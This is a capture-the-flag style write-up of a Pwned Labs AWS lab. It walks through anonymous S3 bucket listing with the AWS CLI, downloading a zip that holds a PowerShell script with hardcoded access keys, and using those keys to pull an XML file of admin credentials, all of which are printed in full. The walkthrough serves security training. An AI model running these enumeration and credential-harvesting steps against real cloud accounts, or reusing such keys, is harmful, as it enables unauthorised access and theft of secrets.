S3 Enumeration

PWNED Labs is a great resource to get your hands dirty with AWS Penetration Testing.

Today, I'll be going through the S3 Enumeration lab showcasing how easy it is to access an S3 bucket!

Scope

It's your first day on the red team, and you've been tasked with examining a website that was found in a phished employee's bookmarks. Check it out and see where it leads! In scope is the company's infrastructure, including cloud services.

Target

http://dev.huge-logistics.com

We can see that the website uses an S3 bucket called dev.huge-logistics.com for storing static files such as images, CSS and Javascript.

While attempting to access https://s3.amazonaws.com/dev.huge-logistics.com/ and https://s3.amazonaws.com/dev.huge-logistics.com/static/, we get an access denied.

So we can try accessing using the AWS CLI instead.

We specifically use the --no-sign-request flag.

This flag is synonymous to accessing the bucket anonymously, as you would do if you were trying to access an FTP server that is poorly misconfigured and allowed anonymous sign in.

Basically, we are enumerating the S3 bucket without having to authenticate ourselves.

aws s3 ls s3://dev.huge-logistics.com --no-sign-request

Now that we can see the contents of the bucket, we can try recursive enumeration.

aws s3 ls s3://dev.huge-logistics.com --no-sign-request --recursive

But access is denied.

However, accessing the shared directory works and we find a zip file that we can download.

Khangs-MBP:~ khangtran$ aws s3 ls s3://dev.huge-logistics.com/shared/ --no-sign-request
2023-10-16 11:08:33          0
2023-10-16 11:09:01        993 hl_migration_project.zip

Download

aws s3 cp s3://dev.huge-logistics.com/shared/hl_migration_project.zip . --no-sign-request

Unzipping the file reveals a PowerShell script

We discover inside the file hardcoded access keys!

Khangs-MBP:~ khangtran$ cat migrate_secrets.ps1
# AWS Configuration
$accessKey = "AKIA3SFMDAPOWOWKXEHU"
$secretKey = "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"
$region = "us-east-1"

# Set up AWS hardcoded credentials
Set-AWSCredentials -AccessKey $accessKey -SecretKey $secretKey

# Set the AWS region
Set-DefaultAWSRegion -Region $region

# Read the secrets from export.xml
[xml]$xmlContent = Get-Content -Path "export.xml"

# Output log file
$logFile = "upload_log.txt"

# Error handling with retry logic
function TryUploadSecret($secretName, $secretValue) {
    $retries = 3
    while ($retries -gt 0) {
        try {
            $result = New-SECSecret -Name $secretName -SecretString $secretValue
            $logEntry = "Successfully uploaded secret: $secretName with ARN: $($result.ARN)"
            Write-Output $logEntry
            Add-Content -Path $logFile -Value $logEntry
            return $true
        } catch {
            $retries--
            Write-Error "Failed attempt to upload secret: $secretName. Retries left: $retries. Error: $_"
        }
    }
    return $false
}

foreach ($secretNode in $xmlContent.Secrets.Secret) {
    # Implementing concurrency using jobs
    Start-Job -ScriptBlock {
        param($secretName, $secretValue)
        TryUploadSecret -secretName $secretName -secretValue $secretValue
    } -ArgumentList $secretNode.Name, $secretNode.Value
}

# Wait for all jobs to finish
$jobs = Get-Job
$jobs | Wait-Job

# Retrieve and display job results
$jobs | ForEach-Object {
    $result = Receive-Job -Job $_
    if (-not $result) {
        Write-Error "Failed to upload secret: $($_.Name) after multiple retries."
    }
    # Clean up the job
    Remove-Job -Job $_
}

Write-Output "Batch upload complete!"


# Install-Module -Name AWSPowerShell -Scope CurrentUser -Force

We can reconfigure our AWS CLI with these keys, which should give us further access to the S3 bucket.

But lets first check which region the bucket is created in.

curl -I https://s3.amazonaws.com/dev.huge-logistics.com/

us-east-1

Run

aws configure

And use

access-key:AKIA3SFMDAPOWOWKXEHU
secret-key: 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

Check our identity

aws sts get-caller-identity

This reveals an IAM user pam-test.

With these credentials, we are able to access the admin directory, but could not download the flag.

But we were able to reveal more files in the migration-files directory.

Download the xml file

aws s3 cp s3://dev.huge-logistics.com/migration-files/test-export.xml .

cat test-export.xml

We see even more privileged credentials!

Take note of the AWS IT Admin credentials.

Output

<?xml version="1.0" encoding="UTF-8"?>
<CredentialsExport>
    <!-- Oracle Database Credentials -->
    <CredentialEntry>
        <ServiceType>Oracle Database</ServiceType>
        <Hostname>oracle-db-server02.prod.hl-internal.com</Hostname>
        <Username>admin</Username>
        <Password>Password123!</Password>
        <Notes>Primary Oracle database for the financial application. Ensure strong password policy.</Notes>
    </CredentialEntry>
    <!-- HP Server Credentials -->
    <CredentialEntry>
        <ServiceType>HP Server Cluster</ServiceType>
        <Hostname>hp-cluster1.prod.hl-internal.com</Hostname>
        <Username>root</Username>
        <Password>RootPassword456!</Password>
        <Notes>HP server cluster for batch jobs. Periodically rotate this password.</Notes>
    </CredentialEntry>
    <!-- AWS Production Credentials -->
    <CredentialEntry>
        <ServiceType>AWS IT Admin</ServiceType>
        <AccountID>794929857501</AccountID>
        <AccessKeyID>AKIA3SFMDAPOQRFWFGCD</AccessKeyID>
        <SecretAccessKey>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</SecretAccessKey>
        <Notes>AWS credentials for production workloads. Do not share these keys outside of the organization.</Notes>
    </CredentialEntry>
    <!-- Iron Mountain Backup Portal -->
    <CredentialEntry>
        <ServiceType>Iron Mountain Backup</ServiceType>
        <URL>https://backupportal.ironmountain.com</URL>
        <Username>hladmin</Username>
        <Password>HLPassword789!</Password>
        <Notes>Account used to schedule tape collections and deliveries. Schedule regular password rotations.</Notes>
    </CredentialEntry>
    <!-- Office 365 Admin Account -->
    <CredentialEntry>
        <ServiceType>Office 365</ServiceType>
        <URL>https://admin.microsoft.com</URL>
        <Username>admin@company.onmicrosoft.com</Username>
        <Password>O365Password321!</Password>
        <Notes>Office 365 global admin account. Use for essential administrative tasks only and enable MFA.</Notes>
    </CredentialEntry>
    <!-- Jira Admin Account -->
    <CredentialEntry>
        <ServiceType>Jira</ServiceType>
        <URL>https://hugelogistics.atlassian.net</URL>
        <Username>jira_admin</Username>
        <Password>JiraPassword654!</Password>
        <Notes>Jira administrative account. Restrict access and consider using API tokens where possible.</Notes>
    </CredentialEntry>
</CredentialsExport>

AWS IT Admin